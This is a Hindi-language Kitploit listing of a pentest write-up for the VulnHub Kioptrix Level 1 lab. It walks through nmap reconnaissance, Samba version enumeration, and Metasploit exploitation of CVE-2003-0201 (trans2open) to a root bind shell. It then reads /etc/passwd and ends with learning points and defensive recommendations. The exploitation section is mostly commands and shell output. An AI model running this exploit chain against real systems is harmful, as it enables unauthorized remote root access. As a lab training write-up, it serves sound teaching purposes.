Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
pentest-writeups — Kioptrix लेवल 1 राइटअप - CVE-2003-0201 Samba trans2open | Kitploit
उपकरण/GitHubGitHub/americooo/pentest-writeups
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubamericooo/pentest-writeups

pentest-writeups

Kioptrix लेवल 1 राइटअप - CVE-2003-0201 Samba trans2open

21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

pentest-writeups

Kioptrix स्तर 1 राइटअप - CVE-2003-0201 Samba trans2open

Kioptrix स्तर 1 — पेनेट्रेशन टेस्टिंग राइटअप

लेखक: Amirbek Raxmatullayev (@americo_444)
दिनांक: 2026-06-17
प्लेटफ़ॉर्म: VulnHub
कठिनाई: शुरुआती
उद्देश्य: रूट एक्सेस प्राप्त करना


1. पर्यावरण सेटअप

घटकविवरण
होस्ट ओएसUbuntu 26.04
हाइपरवाइज़रQEMU/KVM
लक्ष्यKioptrix Level 1 (VMDK)
हमलावर आईपी192.168.56.1
लक्ष्य आईपी192.168.56.101

नोट: VirtualBox कर्नेल 7.0.0-22-generic के साथ DKMS KVM नेमस्पेस विरोध के कारण असंगत था। QEMU/KVM पर स्विच किया गया और VMDK को बिना रूपांतरण के सीधे लोड किया गया।

root@kitploit:~
qemu-system-x86_64 \
  -m 512 \
  -drive file="Kioptix Level 1.vmdk",format=vmdk \
  -netdev bridge,id=net0,br=virbr0 \
  -device e1000,netdev=net0 \
  -display gtk

2. टोही

2.1 होस्ट डिस्कवरी

root@kitploit:~
nmap -sn 192.168.56.0/24

परिणाम: लक्ष्य 192.168.56.101 पर पहचाना गया।

2.2 पूर्ण पोर्ट और सेवा स्कैन

root@kitploit:~
nmap -sV -sC -p- 192.168.56.101

खुले पोर्ट:

2.3 एसएमबी संस्करण गणना

root@kitploit:~
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
  set RHOSTS 192.168.56.101; run; exit"

परिणाम: Samba 2.2.1a — गंभीर रूप से कमजोर संस्करण की पुष्टि हुई।


3. भेद्यता विश्लेषण

CVE-2003-0201 — Samba trans2open बफर ओवरफ्लो

विवरण:
Samba संस्करण 2.2.x में trans2open फ़ंक्शन में स्टैक-आधारित बफर ओवरफ्लो भेद्यता है। यह एक अनप्रमाणित दूरस्थ हमलावर को रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है।

प्रभावित संस्करण: Samba 2.0.x — 2.2.8
सीवीएसएस स्कोर: 10.0 (गंभीर)
एक्सप्लॉइट मॉड्यूल: exploit/linux/samba/trans2open


4. एक्सप्लॉइटेशन

4.1 Metasploit कॉन्फ़िगरेशन

root@kitploit:~
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run

bind_tcp के बजाय reverse_tcp क्यों?
reverse_tcp पेलोड विफल रहा क्योंकि Kioptrix VM NAT/ब्रिज कॉन्फ़िगरेशन के माध्यम से हमलावर तक वापस नहीं पहुंच सका। bind_tcp के साथ, हमलावर लक्ष्य से कनेक्ट होता है — पीड़ित से कोई आउटबाउंड कनेक्शन आवश्यक नहीं है।

4.2 एक्सप्लॉइटेशन आउटपुट

root@kitploit:~
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)

शेल प्राप्त हुआ! ✅


5. पोस्ट-एक्सप्लॉइटेशन

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=99(nobody)

hostname
# kioptrix.level1

uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:501:501::/home/harold:/bin/bash

सिस्टम जानकारी:

  • ओएस: Red Hat Linux, कर्नेल 2.4.7 (2001 में निर्मित)
  • स्थानीय उपयोगकर्ता मिले: root, john, harold

6. हमला श्रृंखला

root@kitploit:~
[Attacker: 192.168.56.1]
        |
        | Step 1: nmap full port scan
        v
[Target: 192.168.56.101]
        |
        | Step 2: Samba 2.2.1a identified
        v
[Metasploit — trans2open exploit]
        |
        | Step 3: Stack buffer overflow triggered
        v
[Bind shell opened on port 4444]
        |
        | Step 4: whoami = root
        v
[TARGET PWNED]

7. मुख्य सीख

मैंने क्या सीखा:

  • जब VirtualBox विफल हो जाए तो QEMU/KVM के साथ लैब वातावरण स्थापित करना
  • nmap -sV -sC के साथ सेवा फ़िंगरप्रिंटिंग
  • Metasploit सहायक मॉड्यूल का उपयोग करके SMB गणना
  • CVE-2003-0201 — स्टैक बफर ओवरफ्लो तंत्र को समझना
  • bind_tcp और reverse_tcp पेलोड के बीच अंतर और प्रत्येक का उपयोग कब करें

रक्षात्मक अनुशंसाएँ (ब्लू टीम):

  1. Samba को संस्करण 3.x या उससे बाद में अपग्रेड करें
  2. फ़ायरवॉल के माध्यम से पोर्ट 139/445 प्रतिबंधित करें — केवल विश्वसनीय आंतरिक होस्ट को अनुमति दें
  3. सभी उपलब्ध OS और सेवा पैच लागू करें
  4. नेटवर्क विभाजन लागू करें — SMB को कभी भी बाहरी रूप से उजागर नहीं किया जाना चाहिए
  5. SMB पर बफर ओवरफ्लो प्रयासों का पता लगाने के लिए IDS/IPS नियम तैनात करें

8. उपयोग किए गए उपकरण

उपकरणउद्देश्य
nmapपोर्ट स्कैनिंग, सेवा/संस्करण पहचान
Metasploit FrameworkSMB गणना, शोषण
QEMU/KVMलैब वर्चुअलाइज़ेशन
arp-scanहोस्ट डिस्कवरी

9. संदर्भ

  • CVE-2003-0201 — NVD
  • Rapid7 — trans2open मॉड्यूल
  • VulnHub — Kioptrix Level 1

Amirbek Raxmatullayev द्वारा लिखित | BEK Coders Security Research | 2026

टूल डाउनलोड करें
पोर्टसेवासंस्करण
22/tcpSSHOpenSSH 2.9p2
80/tcpHTTPApache 1.3.20
111/tcpRPCrpcbind 2
139/tcpSMBSamba 2.2.1a
443/tcpHTTPSmod_ssl/2.8.4
32768/tcpStatusRPC #100024